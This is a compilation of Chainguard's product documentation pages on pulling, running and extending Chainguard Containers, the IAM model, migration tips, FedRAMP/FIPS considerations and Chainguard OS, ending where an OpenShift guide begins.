--- ### How to Use Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/how-to-use-chainguard-images/ Last Modified: April 8, 2025 Tags: Chainguard Containers, Product Chainguard Containers are based on Wolfi, our Linux undistro designed specifically for containers. Wolfi uses the apk package format, which contributes to making packages smaller and more accountable, resulting in smaller images with traceable provenance information based on cryptographic signatures. In this guide, you'll find general instructions on how to get started using Chainguard Containers and how to migrate existing container-based workflows to use our images. For specific image usage instructions, please refer to our Chainguard Containers Directory, which contains the full list of all images available to the public and their respective documentation. Quickstart: Using Chainguard Containers To get up and running with Chainguard Containers, you can use docker commands to pull and run images. For each specific image, you'll find this guidance on its overview page (for example, see Node, Python, or NGINX). Pulling a Chainguard Container You can pull a Chainguard Container with the docker pull command. For example, to pull down the Git Chainguard Container, you can run the following. docker pull cgr.dev/chainguard/git Without passing a tag or a digest, the reference to the Git image will pull down the default tag, which is :latest. If you have your own registry, you'll need to change the cgr.dev/chainguard path to your own registry path. Chainguard's free Starter container images are also available on Docker Hub. Check out Chainguard's organization page on Docker Hub for a list of all images and instructions. Note that paid Production images can only be accessed from cgr.dev. Pulling by Tag You can also add a relevant tag that you have access to. In the case of the public Git image, you can always pull the :latest tag. Note that not all tags are available for public container images. docker pull cgr.dev/chainguard/git:latest You may use tags to pull a specific version of software like Git, or a specific programming language version, in a catalog you have access to. The Chainguard Containers Directory has tag history pages for each image, for example, the Git Image Tags History, PHP Image Tags History, and JDK Image Tags History. You can learn about the Chainguard Containers tags history in our guide about Using the Tag History API. Pulling by Digest Pulling a Chainguard Container by its digest guarantees reproducibility, as it will ensure that you are using the same image each time (versus the tag that may receive updates). To pull an image by its digest, append the digest, which begins with sha256.

docker pull cgr.dev/chainguard/git@sha256:f6658e10edde332c6f1dc804f0f664676dc40db78ba4009071fea6b9d97d592f

When you pull this image, you'll receive output of the digest, which should match the exact digest you have pulled. To learn more about image digests, you can review our video How to Use Container Image Digests to Improve Reproducibility. Specifying Architecture As Chainguard Containers are built for both AMD64 and ARM64 architecture, you can specify the architecture you would like to use by employing the --platform flag with the docker pull command. In this example, we'll specify using the linux/arm64 architecture with the Go image. docker pull --platform=linux/arm64 cgr.dev/chainguard/go After pulling the image, you can verify the architecture by calling the version.
docker run --rm -t cgr.dev/chainguard/go:latest version You'll receive output similar to the following: go version go1.21.0 linux/arm64 Specifying the platform will ensure that you're using the desired container image and relevant architecture. Running a Chainguard Container You can run a Chainguard Container with the docker run command. Note that because Chainguard Containers are minimalist containers, most of them ship without a shell or package manager. If you would like a shell, you can often use the development image, which is tagged as :latest-dev. For example, Python has its development variant at cgr.dev/chainguard/python:latest-dev. Otherwise, you can work with Chainguard Containers in a way similar to other images. Let's run the Cosign Chainguard Container to check its version. docker run --rm -t cgr.dev/chainguard/cosign:latest version You'll receive the version information that confirms the image is working as expected (preceded by an ASCII-art cosign banner):

cosign: A tool for Container Signing, Verification and Storage in an OCI registry.

GitVersion:    2.0.0
GitCommit:     unknown
GitTreeState:  unknown
BuildDate:     unknown
GoVersion:     go1.20.1
Compiler:      gc
Platform:      linux/arm64

If you would like to review a filesystem, you can use the wolfi-base image: docker run -it cgr.dev/chainguard/wolfi-base This will start a Wolfi container where you can explore the file system and investigate which packages are available. Continue reading the next section to learn more about building off of the Wolfi base image. Extending Chainguard Base Containers It often happens that you want a distroless image with one or two extra packages, for example, you may have a binary with a dependency on curl or git. Ideally you'd like a base image with this dependency already installed. There are a few options here:
- Compile the dependency from source and use a multi-stage Dockerfile to create a new base image. This works, but may require considerable effort to get the dependency compiling and to keep it up to date. This process quickly becomes untenable if you require several dependencies.
- Use the wolfi-base image that includes apk tools to install the package in the traditional Dockerfile manner. This works but sacrifices a lot of the advantages of the "distroless" philosophy.
- Use Chainguard's melange and apko tooling to create a custom base image. This keeps the image as minimal as possible without sacrificing maintainability.

Using the wolfi-base container image The wolfi-base image is a good starting point to try out Chainguard Containers. Unlike most of the other images, which are strictly distroless, wolfi-base includes the apk package manager, which facilitates composing additional software into it. Just keep in mind that the resulting image will be a little larger due to the extra software and won't have a comprehensive SBOM that covers all your dependencies, since the new software will be added as a layer on top of wolfi-base.
The following command will pull the wolfi-base image to your local system and run an interactive shell that you can use to explore the image features: docker run -it --rm cgr.dev/chainguard/wolfi-base /bin/sh -l First you will need to update the list of packages available in Wolfi: apk update Now you can use apk search to search for packages that are already available on Wolfi repositories: apk search curl More packages will be added with time, as the ecosystem matures and drives community involvement. Looking for a specific package that is not yet available? Feel free to open an issue on the wolfi-os GitHub repository. Using the wolfi-base container image within Dockerfiles The following is an example of a Dockerfile that uses wolfi-base as its base image, installing the curl and jq packages in order to make a query to the advice slip API:

FROM cgr.dev/chainguard/wolfi-base
RUN apk update && apk add --no-cache --update-cache curl jq
SHELL ["/bin/sh", "-c"]
CMD curl -s https://api.adviceslip.com/advice --http1.1 | jq .slip.advice

The SHELL command suppresses a warning about the CMD line using shell syntax, which isn't a problem in this example. In other cases, you may want to use the exec form. You can build this Dockerfile as usual: docker build . -t advice-slip:test Then, execute the image with: docker run -it --rm advice-slip:test You should get output like this, with a random piece of advice: "Big things have small beginnings." Check also the Wolfi Images with Dockerfiles guide for more examples using Wolfi-based images with Dockerfiles, and the Getting Started with Distroless guide for more details about distroless images and how to use them in Docker multi-stage builds. A Note regarding package availability in Chainguard Containers Chainguard Containers only contain packages that come from the Wolfi Project or those that are built and maintained internally by Chainguard. Starting in March of 2024, Chainguard will maintain one version of each Wolfi package at a time. These will track the latest version of the upstream software in the package. Chainguard will end patch support for previous versions of packages in Wolfi. Existing packages will not be removed from Wolfi and you may continue to use them, but be aware that older packages will no longer be updated and will accrue vulnerabilities over time. The tools we use to build packages and images remain freely available and open source in Wolfi. This change ensures that Chainguard can provide the most up-to-date patches to all packages for our container image customers. Note that specific package versions can be made available in Production images. If you have a request for a specific package version, please contact us. --- ### Overview of the Chainguard IAM Model URL: https://edu.chainguard.dev/chainguard/administration/iam-organizations/overview-of-chainguard-iam-model/ Last Modified: April 3, 2024 Tags: Product, Reference Chainguard provides a rich Identity and Access Management (IAM) model similar to those used by AWS and GCP. Once authenticated, you can set up a desired structure for managing and delegating Chainguard assets. Organizations and Folders Chainguard's IAM model consists of two structures: Organizations and Folders. An organization is a customer or group of customers working with the same Chainguard resources, while a folder is a collection of resources within a Chainguard organization. Organizations have a unique domain as their identifier and a user can belong to more than one organization.
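To get a concrete sense of this structure, you can list the organizations and folders your account can see with chainctl. This is a sketch assuming you're already authenticated; the exact flags accepted and the columns in the output may differ slightly between chainctl versions:

chainctl iam organizations list -o table
chainctl iam folders list -o table

Each organization and folder is listed with its ID and name, with folders scoped to the organization they were created in.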
It’s possible for organizations to become verified organizations. Verification modifies some aspects of the Chainguard platform user experience to help large organizations guide their user base to the correct resource. This optional process is performed manually by Chainguard, so if you’re interested in verifying your organization, please reach out to your customer support contact. Identities In the context of Chainguard, an identity represents an individual user within an organization. Users typically join an organization after being sent an invitation. After receiving an invitation, the user can sign up with a Google, GitHub, or Gitlab account. In cases like this, the user’s identity is the email address associated with the account they used to log in. Note: If their organization has configured one, a user can sign up with a custom identity provider. In order to create an invitation for a new user, you must choose a role for that user and then create a role-binding to tie that user to the chosen role. Our overview of roles and role-bindings has more information. You can also create assumable identities. These are typically used to allow automation tools like GitHub Actions or Amazon Lambda to connect to and manage Chainguard resources. Refer to our guide on assumable identities to learn more. Logging in to the Chainguard Platform To authenticate into the Chainguard platform, run the following login command. chainctl auth login A web browser window will open to prompt you to log in via your chosen OIDC flow. Select the account which you wish to log in as, and you can then begin managing your Chainguard resources. Using the headless login flow Note that you can also use chainctl’s --headless option to log in. This option allows you to log in to the Chainguard platform from a device that doesn’t have a browser installed, such as a container or remote server. The headless login flow is when you invoke chainctl auth login --headless in the terminal. chainctl auth login --headless By including this option, chainctl will output an eight-character code as well as a URL (https://auth.chainguard.dev/activate). You can then navigate to the URL on another device’s browser and enter the code, and then you can complete the login process to Chainguard from that device. Be aware that the --headless login code will only be valid for 900 seconds. --- ### Tips for Migrating to Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/migration-tips/ Last Modified: May 29, 2025 Tags: Chainguard Containers, Product The process of migrating over to Chainguard Containers isn’t always straightforward. To help customers become acquainted with Chainguard Containers as they go through the migration process, we’ve assembled this list of tips and strategies for migrating over their applications. Use Development Variants When You Need a Shell Chainguard provides development (or -dev) variants of its containers which include a shell and package manager to allow users to more easily debug and modify the image. To illustrate, if you try to get a shell in the cgr.dev/chainguard/nginx:latest image it will return an error: docker run -it --entrypoint /bin/sh --user root cgr.dev/chainguard/nginx:latest docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: exec: "/bin/sh": stat /bin/sh: no such file or directory: unknown. 
But this is possible with the latest-dev variant:

```
docker run -it --entrypoint /bin/sh --user root cgr.dev/chainguard/nginx:latest-dev
/ # apk add php
fetch https://packages.wolfi.dev/os/aarch64/APKINDEX.tar.gz
(1/6) Installing xz (5.4.6-r0)
(2/6) Installing libxml2 (2.12.6-r0)
(3/6) Installing php-8.2-config (8.2.18-r0)
(4/6) Installing readline (8.2-r3)
(5/6) Installing sqlite-libs (3.45.1-r0)
(6/6) Installing php-8.2 (8.2.18-r0)
OK: 66 MiB in 38 packages
/ #
```

Although the -dev variants have security features similar to their distroless counterparts — such as complete SBOMs and signatures — they feature additional software that is typically not necessary in production environments. The general recommendation is to use the -dev variants only to build the application and then copy all application artifacts into a distroless image, which will result in a final container image that has a minimal attack surface and won’t allow package installations or logins.

That being said, it’s worth noting that -dev variants of Chainguard Containers are completely fine to run in production environments. After all, the -dev variants are still more secure than many popular container images based on fully-featured operating systems such as Debian and Ubuntu since they carry less software, follow a more frequent patch cadence, and offer attestations for what they include.

Install a Different Shell

The -dev variants and chainguard-base image use the ash shell from BusyBox by default. This is nice from a minimalism perspective, but it’s not so great if you need to port a bash- and Debian-centric entrypoint script to Chainguard Containers. In these cases you have a choice — you can update your scripts to work in ash, or you can install the shell that works with your scripts. There’s no reason to be stuck on the ash shell if you really need bash or zsh. For example:

```
docker run -it cgr.dev/$ORGANIZATION/chainguard-base
423450e3fd52:/# echo {1..5}
{1..5}
423450e3fd52:/# apk add bash
fetch https://packages.wolfi.dev/os/aarch64/APKINDEX.tar.gz
(1/3) Installing ncurses-terminfo-base (6.4_p20231125-r1)
(2/3) Installing ncurses (6.4_p20231125-r1)
(3/3) Installing bash (5.2.21-r1)
OK: 20 MiB in 17 packages
423450e3fd52:/# bash
423450e3fd52:/# echo {1..5}
1 2 3 4 5
423450e3fd52:/#
```

Note that this example uses the chainguard-base image, which is only available as a paid Production Container. To follow along with this example, you would need to be part of an organization that has access to this image.

Use apk search

Following on from the last point, you’ll often need to install extra utilities to provide required dependencies for applications and scripts. These dependencies are likely to have different package names compared to other Linux distributions, so the apk search command can be very useful for finding the package you need. For example, say we are porting a Dockerfile that uses the groupadd command. We could convert this to the BusyBox addgroup equivalent, but it’s also perfectly fine to add the groupadd utility.
The only issue is that there’s no groupadd package, so we have to search for it: docker run -it cgr.dev/$ORGANIZATION/chainguard-base ae154854dc6d:/# groupadd /bin/sh: groupadd: not found ae154854dc6d:/# apk add groupadd ERROR: unable to select packages: groupadd (no such package): required by: world[groupadd] ae154854dc6d:/# apk search groupadd shadow-4.15.1-r0 ae154854dc6d:/# apk add shadow (1/4) Installing libmd (1.1.0-r1) (2/4) Installing libbsd (0.12.2-r0) (3/4) Installing linux-pam (1.6.1-r0) (4/4) Installing shadow (4.15.1-r0) OK: 20 MiB in 18 packages ae154854dc6d:/# groupadd Usage: groupadd [options] GROUP Options: -f, --force exit successfully if the group already exists, and cancel -g if the GID is already used -g, --gid GID use GID for the new group -h, --help display this help message and exit -K, --key KEY=VALUE override /etc/login.defs defaults -o, --non-unique allow to create groups with duplicate (non-unique) GID -p, --password PASSWORD use this encrypted password for the new group -r, --system create a system account -R, --root CHROOT_DIR directory to chroot into -P, --prefix PREFIX_DIR directory prefix -U, --users USERS list of user members of this group Another useful trick is the cmd: syntax for finding packages that provide commands. For example, searching for ldd returns multiple results: ae154854dc6d:/# apk search ldd dpkg-dev-1.22.6-r0 nfs-utils-2.6.4-r1 posix-libc-utils-2.39-r1 But if we use the cmd: syntax we only get a single result: ae154854dc6d:/# apk search cmd:ldd posix-libc-utils-2.39-r1 And we can even use the syntax directly in apk add: ae154854dc6d:/# apk add cmd:ldd (1/4) Installing ncurses-terminfo-base (6.4_p20231125-r1) (2/4) Installing ncurses (6.4_p20231125-r1) (3/4) Installing bash (5.2.21-r1) (4/4) Installing posix-libc-utils (2.39-r1) OK: 27 MiB in 22 packages Watch Out for Entrypoint Differences In some cases, the entrypoint of Chainguard Containers can have a different behavior from their equivalent images based on other distros. This happens because many popular container images use an entrypoint script that allows running commands on the image through a shell. Since our images typically don’t have a shell by default, this can lead to unexpected behavior. For example, if you run Docker Hub’s official Python image, it opens the Python interpreter by default: docker run -it python Python 3.12.3 (main, Apr 10 2024, 11:26:46) [GCC 12.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> And the Chainguard Container works in the same way: docker run -it cgr.dev/chainguard/python Python 3.12.3 (main, Apr 9 2024, 16:36:34) [GCC 13.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> exit() But if you pass a Linux command to the Docker Hub image, it will be run from a shell: docker run -it python echo "in a shell" in a shell The Chainguard Python image doesn’t use an entrypoint script. It relies on the Python interpreter as single entrypoint for both the latest and the latest-dev variants. 
So instead of executing the command through a shell, it tries to parse the command as an argument to the Python interpreter:

```
docker run -it cgr.dev/chainguard/python echo "in a shell"
/usr/bin/python: can't open file '//echo': [Errno 2] No such file or directory
```

The same behavior can be observed in the latest-dev variant, which does contain a shell, but uses the Python interpreter as its entrypoint to keep consistency with the latest variant:

```
docker run -it cgr.dev/chainguard/python:latest-dev echo "in a shell"
/usr/bin/python: can't open file '//echo': [Errno 2] No such file or directory
```

Other images, such as our WordPress container images, will have a different entrypoint behavior in their -dev variant to allow for customization and to facilitate migration from other base images. It’s important to always read the image’s documentation to understand how the entrypoint works, and whether there are any major differences from other images you may be used to working with.

Containers Don’t Run As root By Default

Although there are exceptions, Chainguard Containers typically don’t run as the root user. The reason for this is that distroless containers should have no privileged capabilities, and containers that run as a non-root user and use a minimal seccomp profile are ideal from a security perspective. Because they don’t run as the root user, you may need to include a USER root statement in your Dockerfile before installing software on a Chainguard Container. Additionally, be aware that -dev images also do not run as root in most cases, which can result in permission errors like the following:

```
docker run -it --entrypoint bin/bash chainguard/python:latest-dev
bash-5.2$ mkdir test
mkdir: can't create directory 'test': Permission denied
bash-5.2$ sudo mkdir test
bash: sudo: command not found
```

In cases like this, you can instead run a command like the following to access the container’s shell as the root user:

docker run -it --user root --entrypoint bin/bash chainguard/python:latest-dev

Here, the --user option tells Docker to assume the root user role.

Packages Not Found

Container images are usually meant to support every possible use case. Because of this, they often contain packages that aren’t always necessary, which increases the container image’s attack surface and makes it more likely to contain CVEs. Chainguard Containers are built with minimalism in mind, and thus contain the bare minimum packages needed for an image to function. However, this also means that Chainguard Containers may not contain the packages that you’d expect to find in third-party alternatives.

If a Chainguard Container is missing certain packages that are required for your application, we recommend using a base image and installing the required dependencies on top of it, preferably in a multi-stage Docker build. Our guides on How to Use Chainguard Containers and Getting Started with Distroless include guidance on how you can extend Chainguard base images.

Alternatively, you can take advantage of Chainguard’s Custom Assembly and Private APK Repositories features to extend your container images. Custom Assembly allows users to create custom container images with extra packages added. This reduces their risk exposure by creating container images that are tailored to their internal organization and application requirements while still having few-to-zero CVEs. Private APK Repositories, meanwhile, allow customers to pull secure apk packages from Chainguard.
The list of packages available in an organization’s private repository is based on the apk repositories that the organization already has access to. For example, say your organization has access to the Chainguard MySQL container image. Along with mysql, this image comes with other apk packages, including bash, openssl, and pwgen. This means that you’ll have access to these apk packages through your organization’s private APK repository, along with any others that appear in Chainguard container images that your organization has access to.

In some cases you may have Docker builds that copy in binaries to run agents or similar tooling. You may find these binaries don’t work as expected, as they are designed to run on a different Linux distribution. Be aware that Chainguard Containers may not have the dependencies required by third-party binaries, or they may be stored at a different path.

Learn More

For more resources on migrating to Chainguard Containers, please refer to our Containers Migration documentation. In particular, our Migration Overview may be of interest. Chainguard Academy also hosts a number of Compatibility Resources and Migration Guides for specific platforms and tools.

---

### FedRAMP Technical Considerations & Risk Factors

URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/fedramp-considerations/ Last Modified: January 29, 2025 Tags: Chainguard Containers, Product, FIPS

Many frequently asked questions revolve around how organizations are meant to stay on top of the changing landscape for FedRAMP, PMOs, Revisions, and Certificates. This article outlines various considerations and risk factors that organizations should keep in mind when working to become and stay FedRAMP authorized.

Important Considerations for PMO Revision Trends

There are a number of things one should keep in mind when analyzing revision trends from the FedRAMP Program Management Office (PMO) — which oversees the development of the FedRAMP program — and the changes in FIPS 140-3. The following are of particular importance:

- FedRAMP authorization has tended to only include external customer communication under scope. Now, though, the FedRAMP PMO is expecting both external and internal communications in scope.
- Customers will now be required to provide an authorization boundary diagram with an associated network diagram that shows all FIPS-encrypted flows: anything that isn’t encrypted needs to be explicitly highlighted. Auditors will ask that these diagrams and flows not just show this but, in some cases, prove it during the audit with observed testing scenarios.
- Notable Revision 5 Changes (Rev 5 - appendix queue): Customers must list every client and server communication in the infrastructure and which FIPS module is being used. DoD Security Technical Implementation Guides (STIGs) can be required, although CIS Level 2 benchmarks are accepted if a STIG does not exist, marking a change from Revision 4 which only required CIS Level 1 benchmarks.
- In order to get FIPS validated, libraries need to be assessed by one of thirteen authorized labs: National Institute of Standards and Technology (NIST) labs are overwhelmed, as there is a large influx of 140-2 demand but limited supply for approval on certification.
- While FIPS 140-3 is not immediately on the horizon for 2025, it will become the law of the land in 2026.
As organizations begin analyzing their requirements and architecture constraints this year, it will be crucial to review and plan for the upcoming changes that are outlined in this section.

Ongoing FIPS Maintenance Risks (and How Chainguard Can Help)

An organization’s upfront FIPS configuration is important, but the real difficulties often come later on. While organizations frequently pass an audit with their initial configuration, there is a high level of risk associated with ongoing maintenance. This section highlights some of the risks associated with ongoing FIPS maintenance and how Chainguard can resolve them.

Initial configuration vs continued maintenance risk

The need to maintain FIPS across updates and versions, given the dynamically changing nature of applications built on open source software within containers, places a heavy burden on engineers. Likewise, the need to continuously validate cryptographic operations across various base images can pose a significant risk of applications breaking or products going down across version updates and new releases. Additionally, certificates often expire, and it is difficult to keep track of this at scale and update FIPS modules accordingly, presenting a heavy workload for compliance teams. Critical vulnerabilities often present themselves in the critical path for organizations, requiring a detailed Plan of Action and Milestones (POAM) and remediation efforts beyond the initial FIPS configuration.

With Chainguard, there is a single partner to hold accountable, as we offer enterprise SLAs that can take the place of costly manual operations. This includes 7 days for Critical vulnerabilities, and 14 days for High, Medium, and Low. This not only allows the initial CVE count to remain close to 0 during auditing events, but also accounts for any future CVEs that might show up within the ATO boundary.

FIPS expertise and resource challenges

Typically, an organization must oversee several key resources with advanced expertise to manage the ongoing configuration and maintenance of a FIPS or FedRAMP Authorization to Operate (ATO). However, this expertise is not always shared across developers, application owners, and security teams. This problem scales with more images and boundaries under consideration. For a fixed fee per image, Chainguard will solve this problem by being directly responsible for the build and maintenance of all FIPS images in use, leveraging in-house expertise across a broad set of domains.

Quality testing for immediate use of Chainguard-provided FIPS images

One of the hardest parts of moving an image program to a CMVP-certified FIPS module is accommodating all of the differences across programming languages and image types. To solve this, Chainguard provides not only the initial configuration, but also the ongoing quality and functional testing across programming languages and application-specific requirements for FIPS, to ensure that organizations only have to worry about running their services on these images. This includes a broad test suite across version updates while balancing the trade-offs between CVE fixes and limiting breaking changes to the running applications.

Application-specific open source software

While FIPS modules can be easier to implement within the base layer of an image, application-specific projects within the open source community are entirely maintained by the respective community maintainers and project owners. This means that FIPS considerations vary dramatically across these projects.
Building these application images on top of existing FIPS-base images presents significant risk and additional cost associated with ensuring it is compliant through FTE efforts. Furthermore, many open source projects, such as Cassandra, cannot even support FIPS validation in their current state until they change the architecture and source code to be able to support this. Knowing which projects can support FIPS and which cannot is very useful in analyzing images within scope. Since Chainguard’s catalog consists of 100s of FIPS validated images, we have done the heavy lifting of this analysis, and continue to do so for new requests from our customers. Revision 5 Key Requirements Solved with Chainguard Container Images Using Chainguard Containers eliminates the manual toil of container security hassles. Hardened and low CVE images save you time and money by making sure you always meet the security standards needed for government work. The following table highlights the features of Chainguard Containers as mapped to FedRAMP Revision 5’s baselines: Additionally, Chainguard helps support CM-6 configuration settings requirements. Chainguard announced the release of a STIG for the General Purpose Operating System (GPOS) SRG which specifies security requirements for general purpose operating systems running in a network. The goal for this STIG is that it will help customers confidently and securely integrate Chainguard Containers into their workflows. Please refer to our STIGS Overview for more information. Kernel-Independent FIPS Container Images Cryptographic protection relies on the secure implementation of a trusted algorithm and a random bit generator that cannot be reasonably predicted at any greater accuracy than random chance. To certify these implementations, NIST operates a cryptographic certification program called the Cryptographic Module Validation Program (CMVP). CMVP validates that implementation is compliant with the relevant standards: For algorithm implementation, CMVP requires strict compliance with FIPS standards. Thus FIPS modules must sit inside a self-verified cryptographic boundary. For random bit generators, CMVP requires strict compliance with SP 800-90B recommendations and permits entropy sources to sit either inside or outside the FIPS cryptographic boundary. Traditionally, to meet these compliance requirements, containers would access an SP 800-90B compliant entropy source provided by a certified kernel, as in this diagram: This architecture drives significant friction for vendors delivering FIPS compliant workloads for modern cloud-native applications. First, very few versions of the Linux Kernel are certified. Second, Linux Kernel certification timelines are often long and arduous. Ultimately, this results in a very limited choice of certified runtimes and compatible underlying hardware for developers to build on. In practice, it means that a certified kernel from a given vendor might be over 5 years old. Outdated kernels typically lack support and optimizations for the latest generation of hardware, and are often incompatible with the latest cloud instance types. It also means when sticking to the same vendor, the application runtimes are equally as out of date and vulnerable. Chainguard’s solution has the FIPS module and the SP 800-90B entropy source co-located in the container image userspace. This eliminates the need for a certified Linux kernel for the majority of workloads and streamlines engineering effort for workload deployments. 
This is why Chainguard FIPS images now ship with a certified userspace SP 800-90B entropy source, as in this design: This means that the entropy source is now independent of the hardware or cloud environment. Essentially, you can have FIPS on any host OS, kernel, and hardware. You can even have FIPS on managed cloud Kubernetes platforms like GKE, EKS, and AKS. Note that this solution has been tested by two NIST labs and carries its own CMVP certification. For more information, please refer to the CMVP entries for Chainguard’s FIPS Modules and entropy source:

- OpenSSL FIPS 3.0 Provider Module (CMVP #4856)
- Bouncy Castle FIPS Java API (CMVP #4743 [historical: CMVP #4616])
- Chainguard CPU Time Jitter RNG Entropy Source (ESV Entropy Certificate #E191)

Additionally, check out our blog post on Kernel-Independent FIPS Containers.

Conclusion

While FIPS 140-2 has become relatively familiar to organizations, it still presents a set of complex challenges for those trying to achieve FedRAMP authorization. With the broad adoption of open source development on container images across development teams beginning to accelerate, the problem of configuring and maintaining FIPS modules within a broad suite of images becomes nearly intractable. Skill gaps and resource shortages make it even harder to keep up with this demand, and this problem will only get worse when 140-3 becomes the law of the land in 2026.

The Rev-5 changes signal a continued trend in the market: as PMOs get better at understanding the state of modernized applications running on containers, and how the architectures interact with the services running, requirements are only becoming more granular. As a result, further documentation and proof will be required of organizations that are seeking to implement FIPS within their container environments. This puts pressure on organizations to fill skill gaps, increase the spend going towards FedRAMP programs, and de-risk ongoing assessments to maintain compliance.

Chainguard offers an off-the-shelf solution for customers to run their applications on preconfigured and continuously maintained FIPS-validated images so that they do not have to incur these costs or associated risks. As a result, Chainguard has helped customers achieve Moderate and High impact levels with very low engineering lift. With this comes the peace of mind of knowing that you have a single partner responsible for building and supplying the key images needed to be successful in FedRAMP endeavors.

---

### Overview of Chainguard OS

URL: https://edu.chainguard.dev/chainguard/chainguard-os/overview/ Last Modified: July 3, 2025 Tags: Chainguard OS, Product

Chainguard OS was built in-house to enable a more secure, agile, and efficient software distribution model, so that downstream products like container images could benefit from our organization’s approach. Chainguard OS adheres to four key principles:

- Continuous Integration and Delivery
- Nano Updates and Rebuilds
- Minimal, Hardened, Immutable Artifacts
- Delta Minimization

On this page, we’ll discuss each of these components and how Chainguard OS differs from the operating system status quo.

Continuous Integration and Continuous Delivery (CI/CD)

Chainguard OS emphasizes the continuous integration, testing, and release of upstream software packages, ensuring a streamlined and efficient development pipeline through automation.
Chainguard OS was built to prioritize CI/CD of software artifacts so that thousands of independent (or loosely dependent) open source projects could be more securely built into hundreds of thousands of versioned “packages.” Unlike traditional distros, there is no major OS version (such as RHEL7 or Ubuntu 22.04 LTS) with a pinned catalog of packages; every available package is always installable with Chainguard OS, which also accepts a wide range of packaging ecosystems, including all of the language-specific package managers beyond Chainguard OS’s own package manager.

Leveraging event-driven automation, Chainguard OS ensures that every package in the catalog has a “release monitor” capturing new upstream releases right away. This monitor triggers automatic package recompiles, quality assurance and acceptance testing, security scanning, and publication. Chainguard container images that include that package will automatically benefit from updates due to our multi-layer approach that ships updated versions to relevant images. These packages are also published to public and private registries at the same time.

With Chainguard OS, users can rely on products that take advantage of an ever-growing catalog of open source and enterprise software packages. Rather than picking a favorite version of every software project every couple of years and attempting to maintain that for a decade or more, Chainguard OS takes a different approach: it continuously supports, and eventually retires, the same versions that the upstream project maintainers recommend.

Nano Updates and Rebuilds

Favoring incremental updates and rebuilds over major release upgrades, Chainguard OS supports smoother transitions that minimize disruptive changes. Our goal is for engineers adopting Chainguard products to never have to think about major OS version upgrades that dominate a roadmap for months at a time every two years. Through continuously introduced daily nano upgrades, paced through staging and testing gates, any offending regression can be readily pinpointed, reported, and addressed in subsequent updates hours or days later.

Both minor “updates” and major “upgrades” are simultaneously delivered through Chainguard OS. Chainguard Containers offer clear, firm, and distinct boundaries for each application, so that updates and upgrades are cleaner. Chainguard OS takes advantage of the ephemeral application layer of container images being separate from the persistent storage and unique configuration data; it is able to simultaneously instantiate new containers running the updated and upgraded application and destroy the previous instantiation running the down-level application version. In this way, updates (patches) and upgrades (major changes) are introduced instantly, and rollbacks to previous versions can be done by launching the previous container’s image.

Minimal, Hardened, Immutable Artifacts

Chainguard OS produces container images that are minimal in scope, stripped of non-essential components, and hardened for secure use in production environments. The resulting artifacts are immutable and designed to include only the dependencies necessary for a given application to run. Unlike traditional Linux distributions, which aim to be general-purpose and include a wide range of libraries and utilities, Chainguard OS builds application systems: minimal containers tailored to the specific runtime requirements of a single application. Optional complementary tools and packages can be added as needed, but they are not included by default.
This design reduces the system’s overall attack surface, improves performance by eliminating unused software, and supports strict control over what is present in a given execution environment. All images are produced through hardened build processes and are validated against defined security policies. Delta Minimization Chainguard OS maintains a close alignment with upstream open source projects. Extra patches are introduced only when necessary, such as for addressing critical issues or applying hardening measures, and are kept in place only until equivalent changes are integrated upstream. This approach reduces long-term maintenance overhead and avoids divergence from upstream. Chainguard OS implements frequent, incremental updates (what we call nano updates, discussed in the section above) that closely track upstream releases. These updates are designed to preserve the intent and behavior of the original software while delivering improvements and security fixes on an almost daily cadence. By integrating changes continuously and aligning with upstream maintainers’ development cycles, Chainguard OS ensures compatibility and reduces the risk of regressions. This model also helps downstream consumers benefit from the most recent updates without requiring wholesale system upgrades. Advantages of Chainguard OS Chainguard OS is a minimal Linux-based operating system designed to support more secure deployment of containerized applications. It integrates tightly with Chainguard tooling to provide measurable improvements in vulnerability management, compliance, and software supply chain integrity. Vulnerability Management Chainguard OS minimizes exposure to known vulnerabilities by automating detection, triage, and remediation processes. It continuously rebuilds included applications and dependencies using up-to-date toolchains and a hardened image pipeline. The OS includes only essential packages, reducing the attack surface. Continuous Compliance The system architecture and toolchain used in Chainguard OS support the automation of compliance efforts. By consistently regenerating software artifacts in a controlled environment, Chainguard OS ensures that applications and their dependencies remain compliant with common security and regulatory frameworks. Software Supply Chain Security All software components in Chainguard OS are built from source in the Chainguard Factory — a hardened build environment that conforms to SLSA standards. This process mitigates risks of tampering in the build and delivery pipeline. The system also generates cryptographically verifiable artifacts, including signed Software Bills of Materials (SBOMs) and provenance metadata. Operational Efficiency By integrating upstream open source updates directly into the build and delivery process, Chainguard OS reduces the need for manual patching and vulnerability triage. Engineering teams can allocate resources toward feature development rather than maintenance overhead. System Architecture and Design Philosophy Traditional Linux distributions often bundle a broad set of packages and features, which can introduce unnecessary complexity and security risk. Chainguard OS adopts a minimal and purpose-built approach, optimized for containerized environments. The operating system is built to take advantage of modern containerization practices and supports declarative, reproducible builds. Combined with automated tooling, this design enables consistent delivery of secure, traceable container images. 
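One concrete way to check this traceability on a published Chainguard Container is to verify its signature with Cosign. The following is a hedged sketch: the certificate identity and issuer values shown are assumptions based on Chainguard's public signing setup, so confirm the exact values against the current documentation before relying on them.

```sh
# Verify the signature on a public Chainguard Container with Cosign.
# The identity and issuer values below are assumptions -- check Chainguard's
# documentation for the authoritative values.
cosign verify \
  --certificate-oidc-issuer=https://token.actions.githubusercontent.com \
  --certificate-identity=https://github.com/chainguard-images/images/.github/workflows/release.yaml@refs/heads/main \
  cgr.dev/chainguard/wolfi-base | jq
```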
Chainguard OS is not intended as a general-purpose distribution; instead, it serves as a foundational layer for secure application workloads, particularly in environments that require strict controls on software provenance, compliance, and runtime behavior.

---

### How to Use Chainguard Containers with OpenShift

URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/use-with-openshift/ Last Modified: June 17, 2025 Tags: Chainguard Containers, OpenShift, Product

In this guide, you’ll find general instructions for how to get started using Chainguard Containers on Red Hat OpenShift Container Platform. Red Hat OpenShift is an application platform that orchestrates and manages your systems and resources. While it is based on open source software like Kubernetes, OpenShift includes a suite of applications with additional functionality that are configured to work together. Adding Chainguard Containers to your OpenShift deployment saves you the effort of CVE remediation and speeds up your security and compliance efforts.

When using Chainguard Containers with OpenShift, there are some adjustments that need to be made to the usual process. This guide describes those adjustments; see the OpenShift docs for more details.

Adjust Ownership and Permissions

